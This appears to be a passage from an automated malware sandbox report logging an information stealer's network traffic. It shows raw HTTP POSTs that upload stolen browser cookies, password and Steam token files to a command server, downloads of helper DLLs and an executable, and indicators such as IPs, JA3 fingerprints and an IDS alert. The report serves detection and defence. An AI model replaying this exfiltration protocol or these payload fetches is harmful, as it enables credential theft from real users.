Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FBFHDBKJEGHJJJKFIIJEHost: kasm.zubairgul.comContent-Length: 332Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 42 46 48 44 42 4b 4a 45 47 48 4a 4a 4a 4b 46 49 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 64 33 37 36 33 36 33 61 62 37 33 32 64 66 34 34 31 31 36 61 31 65 34 31 30 37 37 64 62 36 36 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 48 44 42 4b 4a 45 47 48 4a 4a 4a 4b 46 49 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 61 35 62 63 38 62 37 33 65 31 32 34 32 35 61 64 63 33 63 33 39 39 64 61 38 31 33 36 38 39 31 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 48 44 42 4b 4a 45 47 48 4a 4a 4a 4b 46 49 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 32 31 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 48 44 42 4b 4a 45 47 48 4a 4a 4a 4b 46 49 49 4a 45 2d 2d 0d 0a Data Ascii: ------FBFHDBKJEGHJJJKFIIJEContent-Disposition: form-data; name="token"ed376363ab732df44116a1e41077db66------FBFHDBKJEGHJJJKFIIJEContent-Disposition: form-data; name="build_id"4a5bc8b73e12425adc3c399da8136891------FBFHDBKJEGHJJJKFIIJEContent-Disposition: form-data; name="mode"21------FBFHDBKJEGHJJJKFIIJE--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CGIDGCGIEGDGDGDGHJKKHost: kasm.zubairgul.comContent-Length: 7341Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sql.dll HTTP/1.1Host: kasm.zubairgul.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AAEHIDAKECFIEBGDHJEBHost: kasm.zubairgul.comContent-Length: 829Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 41 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 64 33 37 36 33 36 33 61 62 37 33 32 64 66 34 34 31 31 36 61 31 65 34 31 30 37 37 64 62 36 36 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 61 35 62 63 38 62 37 33 65 31 32 34 32 35 61 64 63 33 63 33 39 39 64 61 38 31 33 36 38 39 31 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 51 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 64 61 74 61 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 56 46 4a 56 52 51 6b 76 43 55 5a 42 54 46 4e 46 43 54 45 32 4f 54 6b 77 4e 7a 59 31 4e 44 45 4a 4d 56 42 66 53 6b 46 53 43 54 49 77 4d 6a 4d 74 4d 54 41 74 4d 44 55 74 4d 44 63 4b 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 6b 31 4e 7a 51 77 43 55 35 4a 52 41 6b 31 4d 54 45 39 62 6b 35 68 5a 48 46 58 4f 58 56 55 59 31 6b 77 54 31 41 32 53 54 4e 68 5a 6d 35 79 4e 7a 46 76 4e 6b 56 36 59 56 6c 4d 63 32 52 77 56 7a 52 56 52 56 6c 4f 4d 33 5a 5a 63 56 39 79 59 6c 4a 79 54 6b 5a 34 54 54 46 71 62 33 70 51 52 33 56 6f 61 6b 39 53 51 6c 70 4c 53 30 31 36 4d 6e 52 6b 52 48 42 57 5a 54 64 6b 54 6e 56 55 56 33 41 30 51 33 6c 4c 4c 58 70 30 4e 55 6c 7a 4e 6e 64 57 52 57 78 32 5a 56 64 42 5a 6b 74 52 5a 33 64 4f 53 6d 6c 4c 53 33 52 59 53 45 4e 44 51 32 31 79 62 47 64 36 57 6c 52 73 4e 55 4e 70 53 32 70 55 5a 55 45 79 61 56 46 78 5a 6a 5a 36 62 46 4a 4c 4d 6d 67 34 64 32 63 78 61 46 5a 77 53 58 4e 58 63 32 46 4c 63 57 46 58 53 6e 6c 49 54 56 42 47 4d 30 70 42 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 2d 2d 0d 0a Data Ascii: ------AAEHIDAKECFIEBGDHJEBContent-Disposition: form-data; name="token"ed376363ab732df44116a1e41077db66------AAEHIDAKECFIEBGDHJEBContent-Disposition: form-data; name="build_id"4a5bc8b73e12425adc3c399da8136891------AAEHIDAKECFIEBGDHJEBContent-Disposition: form-data; name="file_name"Q29
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BFIIEHJDBKJKECBFHDGHHost: kasm.zubairgul.comContent-Length: 437Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 46 49 49 45 48 4a 44 42 4b 4a 4b 45 43 42 46 48 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 64 33 37 36 33 36 33 61 62 37 33 32 64 66 34 34 31 31 36 61 31 65 34 31 30 37 37 64 62 36 36 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 49 45 48 4a 44 42 4b 4a 4b 45 43 42 46 48 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 61 35 62 63 38 62 37 33 65 31 32 34 32 35 61 64 63 33 63 33 39 39 64 61 38 31 33 36 38 39 31 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 49 45 48 4a 44 42 4b 4a 4b 45 43 42 46 48 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 47 46 7a 63 33 64 76 63 6d 52 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 49 45 48 4a 44 42 4b 4a 4b 45 43 42 46 48 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 64 61 74 61 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 49 45 48 4a 44 42 4b 4a 4b 45 43 42 46 48 44 47 48 2d 2d 0d 0a Data Ascii: ------BFIIEHJDBKJKECBFHDGHContent-Disposition: form-data; name="token"ed376363ab732df44116a1e41077db66------BFIIEHJDBKJKECBFHDGHContent-Disposition: form-data; name="build_id"4a5bc8b73e12425adc3c399da8136891------BFIIEHJDBKJKECBFHDGHContent-Disposition: form-data; name="file_name"cGFzc3dvcmRzLnR4dA==------BFIIEHJDBKJKECBFHDGHContent-Disposition: form-data; name="file_data"------BFIIEHJDBKJKECBFHDGH--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----ECGIIIDAKJDHJKFHIEBFHost: kasm.zubairgul.comContent-Length: 437Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 64 33 37 36 33 36 33 61 62 37 33 32 64 66 34 34 31 31 36 61 31 65 34 31 30 37 37 64 62 36 36 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 61 35 62 63 38 62 37 33 65 31 32 34 32 35 61 64 63 33 63 33 39 39 64 61 38 31 33 36 38 39 31 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 47 46 7a 63 33 64 76 63 6d 52 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 64 61 74 61 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 2d 2d 0d 0a Data Ascii: ------ECGIIIDAKJDHJKFHIEBFContent-Disposition: form-data; name="token"ed376363ab732df44116a1e41077db66------ECGIIIDAKJDHJKFHIEBFContent-Disposition: form-data; name="build_id"4a5bc8b73e12425adc3c399da8136891------ECGIIIDAKJDHJKFHIEBFContent-Disposition: form-data; name="file_name"cGFzc3dvcmRzLnR4dA==------ECGIIIDAKJDHJKFHIEBFContent-Disposition: form-data; name="file_data"------ECGIIIDAKJDHJKFHIEBF--
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1Host: kasm.zubairgul.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1Host: kasm.zubairgul.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1Host: kasm.zubairgul.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1Host: kasm.zubairgul.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1Host: kasm.zubairgul.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1Host: kasm.zubairgul.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HIDHDGDHJEGHIDGDHCGCHost: kasm.zubairgul.comContent-Length: 1145Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IIEBGIDAAFHIJJJJEGCGHost: kasm.zubairgul.comContent-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 49 45 42 47 49 44 41 41 46 48 49 4a 4a 4a 4a 45 47 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 64 33 37 36 33 36 33 61 62 37 33 32 64 66 34 34 31 31 36 61 31 65 34 31 30 37 37 64 62 36 36 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 42 47 49 44 41 41 46 48 49 4a 4a 4a 4a 45 47 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 61 35 62 63 38 62 37 33 65 31 32 34 32 35 61 64 63 33 63 33 39 39 64 61 38 31 33 36 38 39 31 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 42 47 49 44 41 41 46 48 49 4a 4a 4a 4a 45 47 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 33 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 42 47 49 44 41 41 46 48 49 4a 4a 4a 4a 45 47 43 47 2d 2d 0d 0a Data Ascii: ------IIEBGIDAAFHIJJJJEGCGContent-Disposition: form-data; name="token"ed376363ab732df44116a1e41077db66------IIEBGIDAAFHIJJJJEGCGContent-Disposition: form-data; name="build_id"4a5bc8b73e12425adc3c399da8136891------IIEBGIDAAFHIJJJJEGCGContent-Disposition: form-data; name="mode"3------IIEBGIDAAFHIJJJJEGCG--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JKKFIIEBKEGIEBFIJKFIHost: kasm.zubairgul.comContent-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 4b 46 49 49 45 42 4b 45 47 49 45 42 46 49 4a 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 64 33 37 36 33 36 33 61 62 37 33 32 64 66 34 34 31 31 36 61 31 65 34 31 30 37 37 64 62 36 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4b 46 49 49 45 42 4b 45 47 49 45 42 46 49 4a 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 61 35 62 63 38 62 37 33 65 31 32 34 32 35 61 64 63 33 63 33 39 39 64 61 38 31 33 36 38 39 31 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4b 46 49 49 45 42 4b 45 47 49 45 42 46 49 4a 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4b 46 49 49 45 42 4b 45 47 49 45 42 46 49 4a 4b 46 49 2d 2d 0d 0a Data Ascii: ------JKKFIIEBKEGIEBFIJKFIContent-Disposition: form-data; name="token"ed376363ab732df44116a1e41077db66------JKKFIIEBKEGIEBFIJKFIContent-Disposition: form-data; name="build_id"4a5bc8b73e12425adc3c399da8136891------JKKFIIEBKEGIEBFIJKFIContent-Disposition: form-data; name="mode"4------JKKFIIEBKEGIEBFIJKFI--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IDHDGDHJEGHIDGDHCGCBHost: kasm.zubairgul.comContent-Length: 461Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 48 44 47 44 48 4a 45 47 48 49 44 47 44 48 43 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 64 33 37 36 33 36 33 61 62 37 33 32 64 66 34 34 31 31 36 61 31 65 34 31 30 37 37 64 62 36 36 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 44 47 44 48 4a 45 47 48 49 44 47 44 48 43 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 61 35 62 63 38 62 37 33 65 31 32 34 32 35 61 64 63 33 63 33 39 39 64 61 38 31 33 36 38 39 31 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 44 47 44 48 4a 45 47 48 49 44 47 44 48 43 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 55 32 39 6d 64 46 78 54 64 47 56 68 62 56 78 7a 64 47 56 68 62 56 39 30 62 32 74 6c 62 6e 4d 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 44 47 44 48 4a 45 47 48 49 44 47 44 48 43 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 64 61 74 61 22 0d 0a 0d 0a 6a 69 6d 78 66 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 44 47 44 48 4a 45 47 48 49 44 47 44 48 43 47 43 42 2d 2d 0d 0a Data Ascii: ------IDHDGDHJEGHIDGDHCGCBContent-Disposition: form-data; name="token"ed376363ab732df44116a1e41077db66------IDHDGDHJEGHIDGDHCGCBContent-Disposition: form-data; name="build_id"4a5bc8b73e12425adc3c399da8136891------IDHDGDHJEGHIDGDHCGCBContent-Disposition: form-data; name="file_name"U29mdFxTdGVhbVxzdGVhbV90b2tlbnMudHh0------IDHDGDHJEGHIDGDHCGCBContent-Disposition: form-data; name="file_data"jimxfA==------IDHDGDHJEGHIDGDHCGCB--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CBKFIECBGDHJKECAKFBGHost: kasm.zubairgul.comContent-Length: 130037Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GIJDGCAEBFIIECAKFHIJHost: kasm.zubairgul.comContent-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 64 33 37 36 33 36 33 61 62 37 33 32 64 66 34 34 31 31 36 61 31 65 34 31 30 37 37 64 62 36 36 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 61 35 62 63 38 62 37 33 65 31 32 34 32 35 61 64 63 33 63 33 39 39 64 61 38 31 33 36 38 39 31 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 35 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 4a 2d 2d 0d 0a Data Ascii: ------GIJDGCAEBFIIECAKFHIJContent-Disposition: form-data; name="token"ed376363ab732df44116a1e41077db66------GIJDGCAEBFIIECAKFHIJContent-Disposition: form-data; name="build_id"4a5bc8b73e12425adc3c399da8136891------GIJDGCAEBFIIECAKFHIJContent-Disposition: form-data; name="mode"5------GIJDGCAEBFIIECAKFHIJ--
Source: global traffic	HTTP traffic detected: GET /ldms/a43486128347.exe HTTP/1.1Host: nsdm.cumpar-auto-orice-tip.roCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GCGCFCBAKKFBFIECAEBAHost: kasm.zubairgul.comContent-Length: 499Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 43 47 43 46 43 42 41 4b 4b 46 42 46 49 45 43 41 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 64 33 37 36 33 36 33 61 62 37 33 32 64 66 34 34 31 31 36 61 31 65 34 31 30 37 37 64 62 36 36 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 43 46 43 42 41 4b 4b 46 42 46 49 45 43 41 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 61 35 62 63 38 62 37 33 65 31 32 34 32 35 61 64 63 33 63 33 39 39 64 61 38 31 33 36 38 39 31 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 43 46 43 42 41 4b 4b 46 42 46 49 45 43 41 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 35 31 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 43 46 43 42 41 4b 4b 46 42 46 49 45 43 41 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 61 73 6b 5f 69 64 22 0d 0a 0d 0a 31 32 38 35 37 34 37 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 43 46 43 42 41 4b 4b 46 42 46 49 45 43 41 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 73 74 61 74 75 73 22 0d 0a 0d 0a 31 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 43 46 43 42 41 4b 4b 46 42 46 49 45 43 41 45 42 41 2d 2d 0d 0a Data Ascii: ------GCGCFCBAKKFBFIECAEBAContent-Disposition: form-data; name="token"ed376363ab732df44116a1e41077db66------GCGCFCBAKKFBFIECAEBAContent-Disposition: form-data; name="build_id"4a5bc8b73e12425adc3c399da8136891------GCGCFCBAKKFBFIECAEBAContent-Disposition: form-data; name="mode"51------GCGCFCBAKKFBFIECAEBAContent-Disposition: form-data; name="task_id"1285747------GCGCFCBAKKFBFIECAEBAContent-Disposition: form-data; name="status"1------GCGCFCBAKKFBFIECAEBA--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GCGCFCBAKKFBFIECAEBAHost: kasm.zubairgul.comContent-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 43 47 43 46 43 42 41 4b 4b 46 42 46 49 45 43 41 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 64 33 37 36 33 36 33 61 62 37 33 32 64 66 34 34 31 31 36 61 31 65 34 31 30 37 37 64 62 36 36 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 43 46 43 42 41 4b 4b 46 42 46 49 45 43 41 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 61 35 62 63 38 62 37 33 65 31 32 34 32 35 61 64 63 33 63 33 39 39 64 61 38 31 33 36 38 39 31 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 43 46 43 42 41 4b 4b 46 42 46 49 45 43 41 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 36 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 43 46 43 42 41 4b 4b 46 42 46 49 45 43 41 45 42 41 2d 2d 0d 0a Data Ascii: ------GCGCFCBAKKFBFIECAEBAContent-Disposition: form-data; name="token"ed376363ab732df44116a1e41077db66------GCGCFCBAKKFBFIECAEBAContent-Disposition: form-data; name="build_id"4a5bc8b73e12425adc3c399da8136891------GCGCFCBAKKFBFIECAEBAContent-Disposition: form-data; name="mode"6------GCGCFCBAKKFBFIECAEBA--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DGIJEGHDAECAKECAFCAKHost: cowod.hopto.orgContent-Length: 3213Connection: Keep-AliveCache-Control: no-cache

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 104.21.53.8 104.21.53.8
Source: Joe Sandbox View	IP Address: 23.197.127.21 23.197.127.21
Source: Joe Sandbox View	IP Address: 95.164.90.97 95.164.90.97

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: AKAMAI-ASN1EU AKAMAI-ASN1EU
Source: Joe Sandbox View	ASN Name: VAKPoltavaUkraineUA VAKPoltavaUkraineUA

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Suricata IDS alerts with low severity for network traffic

Source: Network traffic

Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.7:49980 -> 147.45.44.104:80

Uses a known web browser user agent for HTTP communication

